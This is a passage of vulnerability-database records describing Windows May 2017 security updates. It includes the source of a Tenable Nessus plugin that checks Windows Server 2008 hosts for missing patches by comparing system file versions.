attacker can exploit this, by convincing a user to open a specially crafted document or visit a specially crafted website, to disclose the contents of memory. (CVE-2017-8552)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows 2008 May 2017 Multiple Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0175", "CVE-2017-0190", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0242", "CVE-2017-0244", "CVE-2017-0245", "CVE-2017-0246", "CVE-2017-0258", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280", "CVE-2017-8552"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_WIN2008.NASL", "href": "https://www.tenable.com/plugins/nessus/100063", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100063);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0077\",\n \"CVE-2017-0171\",\n \"CVE-2017-0175\",\n \"CVE-2017-0190\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0220\",\n \"CVE-2017-0242\",\n \"CVE-2017-0244\",\n \"CVE-2017-0245\",\n \"CVE-2017-0246\",\n \"CVE-2017-0258\",\n \"CVE-2017-0263\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\",\n \"CVE-2017-8552\"\n );\n script_bugtraq_id(\n 98097,\n 98102,\n 98103,\n 98108,\n 98109,\n 98110,\n 98111,\n 98112,\n 98114,\n 98115,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98275,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4018196\");\n script_xref(name:\"MSKB\", value:\"4018466\");\n script_xref(name:\"MSKB\", value:\"4018556\");\n script_xref(name:\"MSKB\", value:\"4018821\");\n script_xref(name:\"MSKB\", value:\"4018885\");\n script_xref(name:\"MSKB\", value:\"4018927\");\n script_xref(name:\"MSKB\", value:\"4019149\");\n script_xref(name:\"MSKB\", value:\"4019204\");\n script_xref(name:\"MSKB\", value:\"4019206\");\n script_xref(name:\"MSFT\", value:\"MS17-4018196\");\n script_xref(name:\"MSFT\", value:\"MS17-4018466\");\n script_xref(name:\"MSFT\", value:\"MS17-4018556\");\n script_xref(name:\"MSFT\", value:\"MS17-4018821\");\n script_xref(name:\"MSFT\", value:\"MS17-4018885\");\n script_xref(name:\"MSFT\", value:\"MS17-4018927\");\n script_xref(name:\"MSFT\", value:\"MS17-4019149\");\n script_xref(name:\"MSFT\", value:\"MS17-4019204\");\n script_xref(name:\"MSFT\", value:\"MS17-4019206\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows 2008 May 2017 Multiple Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing multiple security updates released\non 2017/05/09. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows improperly handles objects in memory.\n (CVE-2017-0077)\n\n - A denial of service vulnerability exists in Windows DNS\n Server if the server is configured to answer version\n queries. An attacker who successfully exploited this\n vulnerability could cause the DNS Server service to\n become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system.\n (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0175, CVE-2017-0220)\n\n - An information disclosure vulnerability exists in the\n way some ActiveX objects are instantiated. An attacker\n who successfully exploited this vulnerability could gain\n access to protected memory contents. (CVE-2017-0242)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions. On systems\n with Windows 7 for x64-based Systems or later installed,\n this vulnerability can lead to denial of service.\n (CVE-2017-0244)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-0245)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. On computers\n with Windows 7 for x64-based systems or later installed,\n this vulnerability can lead to denial of service.\n (CVE-2017-0246)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-0258)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory.\n (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the\n GDI component due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n document or visit a specially crafted website, to\n disclose the contents of memory. (CVE-2017-8552)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018196/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018466/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018556/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018821/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018885/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018927/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019149/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019204/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019206/title\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the following security updates :\n\n - KB4018196\n - KB4018466\n - KB4018556\n - KB4018821\n - KB4018885\n - KB4018927\n - KB4019149\n - KB4019204\n - KB4019206\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-05';\n\nkbs = make_list(\n \"4018196\", \n \"4018466\",\n \"4018556\",\n \"4018821\",\n \"4018885\",\n \"4018927\",\n \"4019149\",\n \"4019204\",\n \"4019206\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KB4018196 Applies only to hosts having 'DNS Server' role installed\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\ndns_role_installed = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Services\\DNS\\DisplayName\"\n);\nRegCloseKey(handle:hklm);\nclose_registry(close:TRUE);\n\n# KBs only apply to Windows 2008\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\nvuln = 0;\n\n# 4018196\nif (!isnull(dns_role_installed))\n{\n files = list_dir(basedir:winsxs, level:0, dir_pat:\"dns-server-service_31bf3856ad364e35_\", file_pat:\"^dns\\.exe$\", max_recurse:1);\n vuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19765','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018196\", session:the_session);\n}\n\n# 4018466\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"smbserver-common_31bf3856ad364e35_\", file_pat:\"^srvnet\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19673','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018466\", session:the_session);\n\n# 4018556\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"com-base-qfe-ole32_31bf3856ad364e35_\", file_pat:\"^ole32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19773','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018556\", session:the_session);\n\n# 4018821\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"tdi-over-tcpip_31bf3856ad364e35_\", file_pat:\"^tdx\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19762','6.0.6002.24087'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018821\", session:the_session);\n\n# 4018885\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"tcpip-binaries_31bf3856ad364e35_\", file_pat:\"^tcpip\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19763','6.0.6002.24087'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018885\", session:the_session);\n\n# 4018927\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"rds-datafactory-dll_31bf3856ad364e35_\", file_pat:\"^msadcf\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19770','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018927\", session:the_session);\n\n# 4019149\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"lddmcore_31bf3856ad364e35_\", file_pat:\"^dxgkrnl\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('7.0.6002.19765','7.0.6002.24089'),\n max_versions:make_list('7.0.6002.20000','7.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4019149\", session:the_session);\n\n# 4019204\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"win32k_31bf3856ad364e35_\", file_pat:\"^win32k\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19778','6.0.6002.24095'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4019204\", session:the_session);\n\n# 4019206\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"gdi32_31bf3856ad364e35_\", file_pat:\"^gdi32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19765','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4019206\", session:the_session);\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:28", "description": "The remote Windows host is missing security update 4019213 or cumulative update 4019215. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows 8.1 and Windows Server 2012 R2 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0190", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0228", "CVE-2017-0231", "CVE-2017-0238", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019215.NASL", "href": "https://www.tenable.com/plugins/nessus/100057", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100057);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0171\",\n \"CVE-2017-0190\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0228\",\n \"CVE-2017-0231\",\n \"CVE-2017-0238\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98097,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019215\");\n script_xref(name:\"MSKB\", value:\"4019213\");\n script_xref(name:\"MSFT\", value:\"MS17-4019215\");\n script_xref(name:\"MSFT\", value:\"MS17-4019213\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4019213\nor cumulative update 4019215. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows\n 